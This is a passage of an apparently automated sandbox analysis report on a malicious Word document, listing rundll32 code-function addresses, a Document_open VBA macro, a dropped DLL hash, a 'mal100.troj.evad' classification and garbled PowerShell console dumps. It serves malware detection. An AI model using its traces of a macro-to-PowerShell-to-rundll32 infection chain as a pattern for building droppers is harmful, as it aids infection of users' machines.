                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00245DAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024EDB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024E19F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00235BE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00232DEE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00236BC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002473C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002477C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00249DC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024CDCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023ADCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024B1D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00234BDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026303C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00271E14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E502C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EC83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EC014
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E3856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D9055
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E10BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002DC0B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E188F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002ED099
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E10E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E893D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D6134
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E6934
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EA972
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D5155
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D4152
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002DD1A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EE985
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EB998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002DC9C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D923C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D8217
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D8A60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002ED2EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E6AE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E32F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E72F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E5AC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D32C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EE32D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E531E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D2362
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D6B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EC340
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D73A8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E43BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D1B9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D0BCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E7BDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D542D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D4C27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EBC21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E3C07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002DBC63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002ED45C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002DC485
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EB499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E04E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E5CDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E84D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E6D34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D9DAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D9DAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E7DA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D65BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D85B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D7D8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002DED87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002DC587
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002DB5F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D4DCA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EB5C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002DC652
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D16B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E4689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D3E9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E1ED9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E8F18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002ED713
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E7F6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EA746
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D3F9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E8217
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC014
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F3C07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E923C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F502C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E542D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E4C27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FBC21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FD45C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F3856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E9055
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EC652
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EBC63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E8A60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E3E9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FB499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FD099
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F188F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F4689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EC485
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F10BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EC0B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E16B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F5CDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F1ED9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F84D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F5AC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E32C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F72F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F32F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FD2EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F10E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F6AE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F04E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F531E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F8F18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FD713
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F893D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E6134
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F6D34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F6934
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FE32D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E5155
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E4152
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FA746
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC340
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E6B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FA972
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F7F6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E2362
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E3F9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E1B9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FB998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E7D8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EED87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EC587
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FE985
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F43BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E65BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E85B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E9DAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E9DAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E73A8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F7DA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001ED1A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F7BDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E0BCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E4DCA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EC9C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FB5C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EB5F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DC014
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C8217
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D3C07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C923C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DC83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D502C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C542D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C4C27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DBC21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DD45C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C9055
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D3856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CC652
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C8A60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CBC63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C3E9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DB499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DD099
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D188F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D4689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CC485
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D10BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CC0B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C16B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D5CDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D1ED9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D84D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D5AC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C32C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D72F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D32F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DD2EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D10E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D6AE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D04E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D531E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D8F18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DD713
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D893D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C6134
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D6D34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D6934
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DE32D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C5155
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C4152
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DA746
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DC340
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C6B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DA972
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D7F6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C2362
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C1B9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C3F9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DB998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C7D8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DE985
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CED87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CC587
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D43BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C65BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C85B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C9DAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C9DAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C73A8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D7DA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CD1A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D7BDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C0BCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C4DCA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CC9C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DB5C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CB5F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023BC21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00224C27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023502C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0022542D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023C83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0022923C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00233C07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00228217
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023C014
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0022BC63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00228A60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0022C652
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00233856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00229055
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023D45C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002216B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0022C0B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002310BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002360B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0022C485
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00234689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023188F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023B499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023D099
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00223E9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002304E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002310E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00236AE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023D2EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002372F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002332F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00235AC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002232C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00231ED9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002384D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00235CDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023E32D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00226134
                      Source: ARCH_25_012021.docOLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentationOLE, VBA macro: Module A5ate73kc6cw5njy, Function Document_open
                      Source: ARCH_25_012021.docOLE indicator, VBA macros: true
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\Kaktksw\An6othh\N49I.dll D09BACE1490F6EE322262FF2DA373E861F3B3B9BC03C386CE8A031648F1EAA4F
                      Source: N49I.dll.5.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.evad.winDOC@24/8@1/98
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_007434DF CreateToolhelp32Snapshot,
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$CH_25_012021.docJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC503.tmpJump to behavior
                      Source: ARCH_25_012021.docOLE indicator, Word Document stream: true
                      Source: ARCH_25_012021.docOLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ..%..................................... .........................(.....8.(.............#.........................%.....h.......5kU.......(.....
                      Source: C:\Windows\System32\msg.exeConsole Write: ................T...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......x.(.....L.................(.....
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K......x.].............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.......................j......................u.............}..v....P3......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j..... u...............u.............}..v.....3......0...............x.].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....................#..j......................u.............}..v.....@......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................#..j....X.]...............u.............}..v....@A......0.................].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....#...............s..j......................u.............}..v.....w......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............s..j..... u...............u.............}..v.....x......0...............(.].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....7................/.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7................/.j......................u.............}..v....(.......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....C................/.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C................/.j......................u.............}..v....(.......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....O................/.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O................/.j......................u.............}..v....(.......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v....@.......0................E].....(.......T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[................/.j......................u.............}..v....x.......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.6.2.............}..v............0................E].....$.......T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g................/.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....s................/.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s................/.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
